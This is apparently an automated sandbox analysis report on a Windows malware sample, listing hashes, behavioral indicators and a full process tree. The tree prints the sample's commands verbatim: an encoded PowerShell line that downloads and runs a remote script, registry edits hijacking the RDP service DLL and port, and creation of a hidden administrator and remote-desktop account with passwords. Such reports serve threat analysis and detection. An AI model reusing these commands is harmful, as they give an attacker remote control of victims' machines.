Resubmissions
date              id                 score
02-09-2021 16:57  210902-vgpzjadhhn  10
02-09-2021 16:25  210902-tw1h5sage4  10
02-09-2021 11:31  210902-9dk89x9wb2  10
14-08-2021 13:56  210814-xdxpv1yk2x  10

Analysis
- max time kernel: 1707s
- max time network: 1710s
- platform: windows10_x64
- resource: win10-en
- submitted: 02-09-2021 11:31
Static task: static1
Behavioral task: behavioral1
  Sample: 472208d7ba18d4c14b7e90b9db5d6feb.exe
  Resource: win7-en
Behavioral task: behavioral2
  Sample: 472208d7ba18d4c14b7e90b9db5d6feb.exe
  Resource: win10-en
General
- Target: 472208d7ba18d4c14b7e90b9db5d6feb.exe
- Size: 5.9MB
- MD5: 472208d7ba18d4c14b7e90b9db5d6feb
- SHA1: ff24cc43998ff99e61b1a838e1d51c4888498935
- SHA256: ae1c9d454905ed43654f99b1ea1e8ecc3ae08eb75c3860f46b285ce724ae5e4d
- SHA512: 9ce72c4da799273ae13008c0033c3d0638f224042ae3bb7910ffb5f59a64babbcd8039468b0a94b8fa5f3192f543a59f493878ade5233d9958d874d59a1e1a15
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (9 IoCs)
Processes: powershell.exe
  flow | pid  | process
  19   | 4060 | powershell.exe
  21   | 4060 | powershell.exe
  22   | 4060 | powershell.exe
  23   | 4060 | powershell.exe
  25   | 4060 | powershell.exe
  27   | 4060 | powershell.exe
  29   | 4060 | powershell.exe
  31   | 4060 | powershell.exe
  33   | 4060 | powershell.exe

Modifies RDP port number used by Windows (1 TTPs)

Sets DLL path for service in the registry (2 TTPs)

Processes:
  resource                       | yara_rule
  \Windows\Branding\mediasrv.png | upx
  \Windows\Branding\mediasvc.png | upx
Loads dropped DLL (2 IoCs)
Processes:
  pid  | process
  4044 |
  4044 |
Drops file in Program Files directory (4 IoCs)
Processes: powershell.exe
  description                  | ioc                                                                       | process
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | powershell.exe
  File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | powershell.exe
Drops file in Windows directory (19 IoCs)
Processes: powershell.exe, powershell.exe
  description                  | ioc                                                                                                              | process
  File created                 | C:\Windows\branding\wupsvc.jpg                                                                                   | powershell.exe
  File opened for modification | C:\Windows\branding\Basebrd                                                                                      | powershell.exe
  File created                 | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_0xgmxbov.hqa.ps1              | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4622.tmp                                                     | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4642.tmp                                                     | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4653.tmp                                                     | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4684.tmp                                                     | powershell.exe
  File created                 | C:\Windows\branding\mediasrv.png                                                                                 | powershell.exe
  File created                 | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log          | powershell.exe
  File opened for modification | C:\Windows\branding\wupsvc.jpg                                                                                   | powershell.exe
  File opened for modification | C:\Windows\branding\ShellBrd                                                                                     | powershell.exe
  File opened for modification | C:\Windows\branding\mediasrv.png                                                                                 | powershell.exe
  File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4673.tmp                                                     | powershell.exe
  File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat                | powershell.exe
  File created                 | C:\Windows\branding\mediasvc.png                                                                                 | powershell.exe
  File created                 | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_4d1wes5w.ykw.psm1             | powershell.exe
  File created                 | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP                                                    | powershell.exe
  File created                 | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
  File opened for modification | C:\Windows\branding\mediasvc.png                                                                                 | powershell.exe
Modifies data under HKEY_USERS (64 IoCs)
Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe

Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
Processes:
  description            | flow | ioc
  HTTP User-Agent header | 23   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 25   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 21   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header | 22   | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes: powershell.exe (PIDs 300, 3656, 2304, 2272, 4060)
  pid  | process
  300  | powershell.exe
  300  | powershell.exe
  300  | powershell.exe
  3656 | powershell.exe
  3656 | powershell.exe
  3656 | powershell.exe
  2304 | powershell.exe
  2304 | powershell.exe
  2304 | powershell.exe
  2272 | powershell.exe
  2272 | powershell.exe
  2272 | powershell.exe
  300  | powershell.exe
  300  | powershell.exe
  300  | powershell.exe
  4060 | powershell.exe
  4060 | powershell.exe
  4060 | powershell.exe
Suspicious behavior: LoadsDriver (2 IoCs)
Processes:
  pid | process
  596 |
  596 |
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes
(process tree; indentation follows the depth recorded for each process, with PID and command line on each entry)

C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe  [PID 3664, depth 1]
  command line: "C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 300, depth 2]
    command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  [PID 3464, depth 3]
      command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cxy0z5je\cxy0z5je.cmdline"
      - Suspicious use of WriteProcessMemory
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  [PID 1456, depth 4]
        command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF4C.tmp" "c:\Users\Admin\AppData\Local\Temp\cxy0z5je\CSC2711327840E84D67AC10C09FEDF1C4E4.TMP"
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 3656, depth 3]
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 2304, depth 3]
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 2272, depth 3]
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\reg.exe  [PID 2320, depth 3]
      command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    C:\Windows\system32\reg.exe  [PID 2180, depth 3]
      command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      - Modifies registry key
    C:\Windows\system32\reg.exe  [PID 3816, depth 3]
      command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    C:\Windows\system32\net.exe  [PID 1968, depth 3]
      command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe  [PID 3900, depth 4]
        command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    C:\Windows\system32\cmd.exe  [PID 3580, depth 3]
      command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe  [PID 3312, depth 4]
        command line: cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net.exe  [PID 1856, depth 5]
          command line: net start rdpdr
          - Suspicious use of WriteProcessMemory
          C:\Windows\system32\net1.exe  [PID 2784, depth 6]
            command line: C:\Windows\system32\net1 start rdpdr
    C:\Windows\system32\cmd.exe  [PID 2352, depth 3]
      command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe  [PID 1408, depth 4]
        command line: cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net.exe  [PID 2240, depth 5]
          command line: net start TermService
          - Suspicious use of WriteProcessMemory
          C:\Windows\system32\net1.exe  [PID 588, depth 6]
            command line: C:\Windows\system32\net1 start TermService
    C:\Windows\system32\cmd.exe  [PID 4092, depth 3]
      command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    C:\Windows\system32\cmd.exe  [PID 4036, depth 3]
      command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

C:\Windows\System32\cmd.exe  [PID 2860, depth 1]
  command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe  [PID 3288, depth 2]
    command line: net.exe user WgaUtilAcc 000000 /del
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  [PID 3140, depth 3]
      command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe  [PID 3816, depth 1]
  command line: cmd /C net.exe user WgaUtilAcc 7IbL5mSj /add
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe  [PID 1968, depth 2]
    command line: net.exe user WgaUtilAcc 7IbL5mSj /add
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  [PID 2892, depth 3]
      command line: C:\Windows\system32\net1 user WgaUtilAcc 7IbL5mSj /add

C:\Windows\System32\cmd.exe  [PID 1396, depth 1]
  command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe  [PID 3252, depth 2]
    command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  [PID 1180, depth 3]
      command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe  [PID 2780, depth 1]
  command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GSNTPAWQ$ /ADD
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe  [PID 3656, depth 2]
    command line: net.exe LOCALGROUP "Remote Desktop Users" GSNTPAWQ$ /ADD
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  [PID 2860, depth 3]
      command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GSNTPAWQ$ /ADD

C:\Windows\System32\cmd.exe  [PID 2368, depth 1]
  command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe  [PID 1548, depth 2]
    command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  [PID 3816, depth 3]
      command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe  [PID 2272, depth 1]
  command line: cmd /C net.exe user WgaUtilAcc 7IbL5mSj
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe  [PID 2200, depth 2]
    command line: net.exe user WgaUtilAcc 7IbL5mSj
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  [PID 1396, depth 3]
      command line: C:\Windows\system32\net1 user WgaUtilAcc 7IbL5mSj

C:\Windows\System32\cmd.exe  [PID 2304, depth 1]
  command line: cmd.exe /C wmic path win32_VideoController get name
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\Wbem\WMIC.exe  [PID 3748, depth 2]
    command line: wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe  [PID 2428, depth 1]
  command line: cmd.exe /C wmic CPU get NAME
  C:\Windows\System32\Wbem\WMIC.exe  [PID 3044, depth 2]
    command line: wmic CPU get NAME

C:\Windows\System32\cmd.exe  [PID 1856, depth 1]
  command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  C:\Windows\system32\cmd.exe  [PID 2272, depth 2]
    command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  [PID 4060, depth 3]
      command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      (the -enc argument is base64 of the UTF-16LE string IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), i.e. the URL listed under Malware Config)
      - Blocklisted process makes network request
      - Drops file in Program Files directory
      - Drops file in Windows directory
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\cmd.exe  [PID 200, depth 1]
  command line: cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes
  C:\Windows\system32\net.exe  [PID 2824, depth 2]
    command line: net user wgautilacc 111213
    C:\Windows\system32\net1.exe  [PID 208, depth 3]
      command line: C:\Windows\system32\net1 user wgautilacc 111213
  C:\Windows\system32\net.exe  [PID 3288, depth 2]
    command line: net user wgautilacc /active:yes
    C:\Windows\system32\net1.exe  [PID 2120, depth 3]
      command line: C:\Windows\system32\net1 user wgautilacc /active:yes
Downloads